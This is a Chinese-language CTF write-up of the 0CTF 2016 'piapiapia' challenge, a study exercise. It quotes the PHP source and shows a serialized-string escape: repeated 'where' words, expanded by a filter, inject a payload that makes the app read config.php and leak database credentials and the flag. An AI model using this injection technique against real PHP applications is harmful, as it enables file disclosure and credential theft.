[0CTF 2016]piapiapia
0x00 基础
一般文件的目录又xxx.php.bak/swp,或者查看元素、robots.txt里面有提示,或者www.zip等一系列文件中出现网站源码。也可以使用工具扫描
PHP序列化参考文章
0x01 分析
题中www.zip中包含源码,下载后进行代码审计(不会)翻阅PHP手册,各种百度。在config.php中包含flag,要想办法获取到此文件
config.php
1
2
3
4
5
6
7
| <?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
|
查看index.php
1
2
3
4
5
| if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
|
查看profile.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| <?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
}
?>
|
update.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
|
查看update_profile()函数
1
2
3
4
5
6
| public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
|
查看filter()函数
1
2
3
4
5
6
7
8
| public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
|
在update_profile(),返回到profile.php.
1
2
3
4
5
| $profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
|
序列化后
1
| $profile=a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:8:"12@12.12";s:8:"nickname";s:4:"1234";s:5:"photo";s:39:"upload/d41d8cd98f00b204e9800998ecf8427e";}
|
要让$photo得到的文件是config.php也就是
1
| s:5:"photo";s:39:"upload/d41d8cd98f00b204e9800998ecf8427e";
|
变成
1
| s:5:"photo";s:10:"config.php";
|
序列化后的长度是固定的,但是在经过过滤函数时候,nickname传入where会被替换成hacker,多出一个字符,这样就可以修改反序列化后的photo所对应的文件,使其为config.php。
因为nickname有长度限制使用数组可以绕过
1
2
| if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
|
让nickname的值为"};s:5:"photo";s:10:"config.php";}长度为34,传入34个where
0x03 开始操作
传入参数
访问profile.php
将base64解码
1
2
3
4
5
6
7
| <?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = 'qwertyuiop';
$config['database'] = 'challenges';
$flag = 'flag{94b7c4b2-866d-4189-9b0a-abdf22990071}';
?>
|